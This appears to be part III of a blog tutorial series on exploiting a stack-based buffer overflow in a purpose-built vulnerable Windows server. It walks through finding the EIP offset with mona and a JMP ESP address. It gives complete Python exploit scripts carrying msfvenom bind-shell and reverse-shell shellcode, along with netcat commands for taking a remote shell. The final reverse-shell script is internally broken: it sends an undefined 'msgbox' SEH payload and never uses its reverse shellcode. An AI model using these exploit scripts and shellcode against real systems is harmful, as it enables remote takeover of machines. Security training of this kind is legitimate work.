Stack Based Buffer Overflow Exploit - Part III

• Buffer Overflow - Overview - Part I

• Buffer Overflow - Creating Vulnerable Server - Part II

• Stack Based Buffer Overflow Exploit - Part III

• SEH Based Buffer Overflow Exploit - Part IV

• Buffer Overflow Mitigation & Recommendation Technique - Part V

• Secure Development Lifecycle (SDLC) - Part VI

---

Stack Based Buffer Overflow

In Buffer Overflow Exploit - Part 1, I discussed how Stack Based Buffer Overflow works in a brief manner. But now we are going to take a look at it in detail. You can have a look on this diagram to view the pictorial representation of the Stack-Based Buffer Overflow.  The first thing that we need to do is send more data that the buffer can handle which overwrites the EIP Address as shown in the following figure.

Figure 1. Sending multiple A’s

Till now we just sent a simple message (i.e. Hello world) to the server now we are going to send 1000 A’s to the server and see how the memory looks. Attach the server with immunity debugger and replace the script with the following code.

# changes made in code s.connect((host, port)) junk = b"A"*1000 s.sendall(junk)

Run the code and the output will be the following:

Figure 2. Sending 1000 A’s to the server

Let us take a look at the immunity debugger to see how the memory allocation looks like now.

Figure 3. EIP overwritten

We can see the EIP is overwritten with 41414141. This address is the Hexadecimal representation of “AAAA”. Out of 1000 A’s 4 A’s are in the EIP. There is an access violation trying to execute the code at address 41414141. It is clear that we can control the EIP and replace it with the address we want. Once the vulnerability is known we now need to find the offset on the buffer to know the exact four bytes that overwrite the saved EIP on the stack which lets us control the execution flow. To do that we first need to install the Mona plugin. Mona Plugin could create a random unique pattern which when sent can tell us the exact location (also called offset) of the Address.

Installing & Configuring Mona

Download mona.py. We can simply find it online. Copy mona.py into the Commands folder (inside the Immunity Debugger Application Folder. For me it’s “C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands” ). You can check if mona.py is working by typing “!Mona” in the command bar of the Immunity Debugger. If everything works, the log window will show the help screen of mona.py.

Next, configure mona.py to store data in a folder other than the default. The default location is the Immunity Debugger application folder, so we create a Folder named “logs” in C drive to set it as a working folder. Just type the following in the command bar.

!mona config -set workingfolder c:\logs\%p

The above code sets the working folder for mona.py to the folder that we created. Once mona.py is configured we need to create a unique pattern that would tell us the exact position where EIP is being overwritten.

Creating Unique Pattern

We first need to find the offset that could control the EIP. The fastest method to do this is using a feature in Metasploit, called Metasploit pattern. Inside the framework tools folder, we find the scripts pattern_create.rb and pattern_offset.rb. The former creates a string pattern where every three-character sub-string is unique (e.g..: Aa0Aa1Aa2Aa3Aa4). The second script is to calculate the offset once we know which four bytes fits inside the EIP when the program crashes.

To make things easier, mona.py can create a unique cyclic pattern like Metasploit does. To create a cyclic pattern 1000 bytes in length with mona.py, the following command must be typed in the Immunity Debugger command bar.

!mona pc 1000

This command would create a file named pattern.txt in our Working folder i.e. C:\logs\VulnerableServer\pattern.txt with the cyclic pattern inside. The pattern has to be copied into the python code. Now our attacker code looks like:

s.connect((host, port)) Junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" s.sendall(junk)

The next step is again to attach the VulnerableServer.c file to Immunity Debugger and run the attacker’s script. The process again crashes and shows an access violation. The following diagram shows the EIP value overwritten with the pattern.

Figure 4. EIP overwritten with pattern

We need to take a look at the EIP value and take note of the EIP value so that we can find the exact position (offset) to replace it with another address.

Offset of EIP

To figure out the offset to the EIP control bytes, mona.py offers two options:

!mona pattern_offset 33734132 (where 33734132 is the value of EIP at the crash time) !mona findmsp

The first method shows the distance to the four bytes that control EIP, in the log window of Immunity Debugger.

The second method will create the file C:\logs\VulnerableServer\findmsp.txt. The content of the file should look like:

[+] Looking for cyclic pattern in memory     Cyclic pattern (normal) found at 0x006fd8fc (length 548 bytes)     Cyclic pattern (normal) found at 0x006ff514 (length 548 bytes)     -  Stack pivot between 332 & 880 bytes needed to land in this pattern     Cyclic pattern (normal) found at 0x00203e68 (length 548 bytes)     Cyclic pattern (normal) found at 0x002101c0 (length 548 bytes)     EAX contains normal pattern : 0x68413368 (offset 220)     ECX contains normal pattern : 0x68413368 (offset 220) [+] Examining SEH chain [+] Examining stack (entire stack) - looking for cyclic pattern     Walking stack from 0x006fd000 to 0x006ffffc (0x00002ffc bytes)     0x006fd8fc : Contains normal cyclic pattern at ESP-0x1acc (-6860) : offset 0, length 548 (-> 0x006fdb1f : ESP-0x18a8)     0x006ff514 : Contains normal cyclic pattern at ESP+0x14c (+332) : offset 0, length 548 (-> 0x006ff737 : ESP+0x370) [+] Examining stack (entire stack) - looking for pointers to cyclic pattern     Walking stack from 0x006fd000 to 0x006ffffc (0x00002ffc bytes)     0x006fd86c : Pointer into normal cyclic pattern at ESP-0x1b5c (-7004) : 0x006fd8fc : offset 0, length 548     0x006fd8c0 : Pointer into normal cyclic pattern at ESP-0x1b08 (-6920) : 0x006fd8fc : offset 0, length 548     0x006fed10 : Pointer into normal cyclic pattern at ESP-0x6b8 (-1720) : 0x002101c0 : offset 0, length 548     0x006fed78 : Pointer into normal cyclic pattern at ESP-0x650 (-1616) : 0x002101c0 : offset 0, length 548     0x006ff480 : Pointer into normal cyclic pattern at ESP+0xb8 (+184) : 0x006ff734 : offset 544, length 4     0x006ff4dc : Pointer into normal cyclic pattern at ESP+0x114 (+276) : 0x006ff718 : offset 516, length 32

This method gives a lot of Information that should be known to proceed further. We can see that the EIP contains bytes of the normal pattern at the offset of 548 and the ESP points to the cyclic pattern at the offset of 544 just behind the four bytes that control the EIP. This method also informs us the length to store data. As a plus, mona.py offers information about several memory locations that contain the cyclic pattern, and several memory pointers that point directly to the cyclic pattern. We now have the information needed to write an exploit.

We can put the Shellcode just behind the four bytes that control EIP (at offset 548) because we know that the register ESP is pointing directly to this address. So to change the flow control of the process and control the execution. Let us send 548 A’s to the server and send BBBB. Let's see if the EIP is overwritten with BBBB or not. So our new script looks like:

import socket host = 192.168.x.x             port = 1200                   # The same port as the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) junk=b"A"*548 EIP = b'BBBB’ s.sendall(junk+EIP) s.close() print("The message has been sent.")

As we run it we will get the following output:

Figure 5. Overwriting EIP with BBBB

But with what address are we going to replace EIP?

In the below figure you can see we have replaced the EIP with the JMP ESP Address of DLL. If you recall, in the first part we discussed the Dll file which we stored in C:\VulnerableServer\Debug\dll.dll. Now we are going to use this dll to get the JMP ESP Address.

Figure 6. Overwriting EIP with JMP ESP

Loading DLL

We now need to put the memory address of an instruction that makes a jump to the address ESP points to into EIP. So we need to find an instruction like jmp esp, call esp, or push esp; ret.

Go to View→ Executable Modules and select the dll file whose SafeSEH and ASLR is set to False. This memory address containing a jmp esp instructions is good to put in EIP and make the flow jump to our Shellcode.

Figure 7. Executable Modules

To find instructions like jmp esp, call esp, or push esp; ret. in memory, we are going to use mona.py again. In the Immunity Debugger command bar, after attaching it to the Vulnerable Server process, we execute:

!mona jmp -r ESP

This command tells mona.py to search for an instruction to jump to ESP inside the process binary and the DLLs loaded in memory on execution time (by default it looks in all DLLs loaded in memory; we can use the -m switch to make it search in DLLs passed as parameters). The result is stored in the file C:\logs\VulnerableServer\jmp.txt. Here is what we need:

Figure 8. Mona JMP Output

Since the DLL injected code will be part of the attacked process' address space, it is possible to jump to the injected code. So we need to search for the command JMP ESP and overwrite the EIP Address with the JMP ESP Address.

Figure 9. Search for Command JMP ESP

We can see the JMP ESP address that we found in the Loaded DLL as below.

Figure 10. Address of JMP ESP

The JMP ESP Address is 610C11DF. We use this address of JMP ESP just after 548 A’s or we can call it junk. This address will point directly to our shellcode. Now  lets replace the EIP with the JMP ESP address i.e.(610C11DF).

Note: The EIP address is arranged from backward as it is sent to the stack i.e. \xdf\x11\x0c\x61.

Our code looks like-

import socket host = 192.168.x.x             port = 1200                   # The same port as used by the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) junk=b"A"*548 EIP = b'\xdf\x11\x0c\x61'  s.sendall(junk+EIP) s.close() print("The message has been sent.")

Now the last part is to add the Shellcode. Till now we sent a Junk file and the EIP. Now we need to send the Shellcode.

What is Shellcode?

Shellcode is a small piece of code used as the payload in the exploitation of vulnerability. Below is a simple shellcode that is added to the script which opens a message box. You can use and try it. But I will be explaining how a shellcode can be created.

import socket host = 192.168.x.x             port = 1200                   # The same port as used by the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) junk=b"A"*548 EIP = b'\xdf\x11\x0c\x61'  shellcode= b'\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7' s.sendall(junk+EIP+shellcode) s.close() print("The message has been sent.")

 The output of the above will be shown as:

Figure 11. Output of the payload

What should our shellcode do?

There are 2 types of shell- Bind Shell and Reverse Shell. Both of these are explained in Part 1.

Bind Shell-We need to create a shellcode that will open port 4444 in the server and bind it with the shell or command prompt. Thus if we connect to 4444 it would give us the C:/ drive or full access to the victim machine.

Reverse Shell- We need to create a Shellcode that will 4444 in the attacker's machine and listen to the incoming connection from the server. It would also give us access to the victim’s machine.

How to create a Shellcode?

Bind Shell - To create a Bind Shell code, we will open the terminal in Kali Linux and type the following command:

Msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=4444 -b '\x00\x0a\x0d' -f c

In the above code the payload we are using is windows/shell_bind_tcp. Thus –p is for the payload.  We need to bind shell with port 4444 so we set LPORT as 4444. –b is for the bad characters, so we added the most common characters that should not be used. –f is for the output file and c is the language in which we want. It is not necessary to use C you can also use python.

After typing the following in terminal you will get the Shellcode with the removed bad characters. Copy the Shellcode and add it in the python code.

To ensure ESP is not pointing to the Shellcode when the decoder routine is executed, we add an instruction to decrement ESP (sub esp 240h). To obtain the opcodes that represent the instruction, we use a tool from the Metasploit Framework, metasm_shell.rb.

In the following screenshot we see the use of metasm_shell.rb to generate the opcodes we need:

Figure 12. Generate Opcodes

As we can see, if we generate the opcodes of “sub esp,240h” the opcodes generated contain bad characters (0x00). We solve this by adding to esp a negative number: “add esp,-240h”. The “h” in the operation indicates that we are adding 240 in hex, not in decimal. The above output is same in most cases.  We first add the move esp and then the Shellcode. So our final Bind Tcp Payload looks like:

import time import socket import subprocess host = '192.168.x.x'                 # Ip Address of the Target Machine port = 1200                   # Open port on the Server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port))                        # Connecting to the Port on target machine # Stack-Based Buffer Overflow junk = b"A"*548                                  # Number of A's to send EIP = b'\xdf\x11\x0c\x61'       # JMP EIP Address move_esp = b'\x81\xc4\xc0\xfd\xff\xff' # Creating a bind_tcp Shellcode using metasploit. # msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=4444 -b '\x00\x0a\x0d' -f c bind_tcp = b'\xba\x72\xdf\x28\xc5\xdb\xc2\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x53\x31\x56\x12\x03\x56\x12\x83\xb4\xdb\xca\x30\xc4\x0c\x88\xbb\x34\xcd\xed\x32\xd1\xfc\x2d\x20\x92\xaf\x9d\x22\xf6\x43\x55\x66\xe2\xd0\x1b\xaf\x05\x50\x91\x89\x28\x61\x8a\xea\x2b\xe1\xd1\x3e\x8b\xd8\x19\x33\xca\x1d\x47\xbe\x9e\xf6\x03\x6d\x0e\x72\x59\xae\xa5\xc8\x4f\xb6\x5a\x98\x6e\x97\xcd\x92\x28\x37\xec\x77\x41\x7e\xf6\x94\x6c\xc8\x8d\x6f\x1a\xcb\x47\xbe\xe3\x60\xa6\x0e\x16\x78\xef\xa9\xc9\x0f\x19\xca\x74\x08\xde\xb0\xa2\x9d\xc4\x13\x20\x05\x20\xa5\xe5\xd0\xa3\xa9\x42\x96\xeb\xad\x55\x7b\x80\xca\xde\x7a\x46\x5b\xa4\x58\x42\x07\x7e\xc0\xd3\xed\xd1\xfd\x03\x4e\x8d\x5b\x48\x63\xda\xd1\x13\xec\x2f\xd8\xab\xec\x27\x6b\xd8\xde\xe8\xc7\x76\x53\x60\xce\x81\x94\x5b\xb6\x1d\x6b\x64\xc7\x34\xa8\x30\x97\x2e\x19\x39\x7c\xae\xa6\xec\xe9\xa6\x01\x5f\x0c\x4b\xf1\x0f\x90\xe3\x9a\x45\x1f\xdc\xbb\x65\xf5\x75\x53\x98\xf6\x68\xf8\x15\x10\xe0\x10\x70\x8a\x9c\xd2\xa7\x03\x3b\x2c\x82\x3b\xab\x65\xc4\xfc\xd4\x75\xc2\xaa\x42\xfe\x01\x6f\x73\x01\x0c\xc7\xe4\x96\xda\x86\x47\x06\xda\x82\x3f\xab\x49\x49\xbf\xa2\x71\xc6\xe8\xe3\x44\x1f\x7c\x1e\xfe\x89\x62\xe3\x66\xf1\x26\x38\x5b\xfc\xa7\xcd\xe7\xda\xb7\x0b\xe7\x66\xe3\xc3\xbe\x30\x5d\xa2\x68\xf3\x37\x7c\xc6\x5d\xdf\xf9\x24\x5e\x99\x05\x61\x28\x45\xb7\xdc\x6d\x7a\x78\x89\x79\x03\x64\x29\x85\xde\x2c\x57\x77\xd2\xb8\xc0\x2e\x87\x80\x8c\xd0\x72\xc6\xa8\x52\x76\xb7\x4e\x4a\xf3\xb2\x0b\xcc\xe8\xce\x04\xb9\x0e\x7c\x24\xe8' s.sendall(junk+EIP+move_esp+bind_tcp)                   # STACK-Based Exploit #s.close()                                                         # Closing Port 1200 print("The message has been sent.")

Then restart the process and execute the exploit. If all goes right, this is the result on the Windows box:

Figure 13. Bind TCP Output

The TCP port 4444 is listening with the process ID 3444.

To connect to the port 4444, we just simply need to use netcat command i.e.

Nc <ip of victim's machine> 4444

Every time we would have to manually type it. Just so to automate the process we will be using subprocess to call this command in the terminal. Thus add the following code in the attacker’s script:

from subprocess import call call(["nc","192.168.x.x","4444"])

After you run the netcat command the output will be:

Figure 14. Gaining Shell Access

You got access to the C drive. You can change the drive and delete, modify and insert anything you want in the victim's machine.

Reverse Shellcode - To create a reverse Tcp Shellcode open Kali Linux and type the following command in the terminal.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=4444 -b '\x00\x0a\x0d' -f c

It is similar to what we did in bind tcp. Here the LHOST is the attacker’s IP Address. Copy the shellcode generated and paste it in the python code instead of the bind tcp use reverse tcp. The code looks like:

import time import socket import subprocess host = '192.168.x.x'                      # Ip Address of the Target Machine port = 1200                  # Open port on the Server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port))            # Connecting to the Port on target machine # Creating a reverse_tcp Shellcode using metasploit. # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=4444 -b '\x00\x0a\x0d' -f c reverse_tcp = b'\xdd\xc4\xba\x39\xab\x07\x73\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\x31\x53\x17\x83\xc3\x04\x03\x6a\xb8\xe5\x86\x70\x56\x6b\x68\x88\xa7\x0c\xe0\x6d\x96\x0c\x96\xe6\x89\xbc\xdc\xaa\x25\x36\xb0\x5e\xbd\x3a\x1d\x51\x76\xf0\x7b\x5c\x87\xa9\xb8\xff\x0b\xb0\xec\xdf\x32\x7b\xe1\x1e\x72\x66\x08\x72\x2b\xec\xbf\x62\x58\xb8\x03\x09\x12\x2c\x04\xee\xe3\x4f\x25\xa1\x78\x16\xe5\x40\xac\x22\xac\x5a\xb1\x0f\x66\xd1\x01\xfb\x79\x33\x58\x04\xd5\x7a\x54\xf7\x27\xbb\x53\xe8\x5d\xb5\xa7\x95\x65\x02\xd5\x41\xe3\x90\x7d\x01\x53\x7c\x7f\xc6\x02\xf7\x73\xa3\x41\x5f\x90\x32\x85\xd4\xac\xbf\x28\x3a\x25\xfb\x0e\x9e\x6d\x5f\x2e\x87\xcb\x0e\x4f\xd7\xb3\xef\xf5\x9c\x5e\xfb\x87\xff\x36\xc8\xa5\xff\xc6\x46\xbd\x8c\xf4\xc9\x15\x1a\xb5\x82\xb3\xdd\xba\xb8\x04\x71\x45\x43\x75\x58\x82\x17\x25\xf2\x23\x18\xae\x02\xcb\xcd\x61\x52\x63\xbe\xc1\x02\xc3\x6e\xaa\x48\xcc\x51\xca\x73\x06\xfa\x61\x8e\xc1\xc5\xde\x91\x3a\xae\x1c\x91\x2d\x72\xa8\x77\x27\x9a\xfc\x20\xd0\x03\xa5\xba\x41\xcb\x73\xc7\x42\x47\x70\x38\x0c\xa0\xfd\x2a\xf9\x40\x48\x10\xac\x5f\x66\x3c\x32\xcd\xed\xbc\x3d\xee\xb9\xeb\x6a\xc0\xb3\x79\x87\x7b\x6a\x9f\x5a\x1d\x55\x1b\x81\xde\x58\xa2\x44\x5a\x7f\xb4\x90\x63\x3b\xe0\x4c\x32\x95\x5e\x2b\xec\x57\x08\xe5\x43\x3e\xdc\x70\xa8\x81\x9a\x7c\xe5\x77\x42\xcc\x50\xce\x7d\xe1\x34\xc6\x06\x1f\xa5\x29\xdd\x9b\xd5\x63\x7f\x8d\x7d\x2a\xea\x8f\xe3\xcd\xc1\xcc\x1d\x4e\xe3\xac\xd9\x4e\x86\xa9\xa6\xc8\x7b\xc0\xb7\xbc\x7b\x77\xb7\x94' # For SEH Based junk_seh = b'A'*636                           # Number of A's to send next_seh = b'\xeb\x04\x90\x90'         # 4 byte JMP Address seh = b'\x0b\x14\x0c\x61'                  # Address of SEH nops = b'\x90'*4 s.sendall(junk_seh+next_seh+seh+nops+msgbox)     # SEH Based Exploit s.close()                                                           # Closing Port 1200 print("The message has been sent.")

Unlike Bind Tcp, In the reverse tcp, we would not be connecting to the port number instead we would be listening to the port 4444 for the connection from the server. Thus Open the terminal and type the command below:

nc -lvp 4444

The above code would start the listener  on port 4444. To make these automated write the following command in the attacker’s script.

from subprocess import call call(["nc","-lvp","4444"])

Note: In Reverse Tcp Attacker’s Ip is used to get reverse connection. LHOST is the Attacker’s Ip.

After executing the netcat command you will see the same output as you saw in the bind Tcp as shown in the following diagram.

Figure 15. Gaining Shell Access

In this part, we performed Stack Based Buffer Overflow. If you are facing any difficulty do let me know. I will help you in every way I can. You can leave the questions in the comment below.

In the next tutorial we will see the SEH Based Buffer overflow.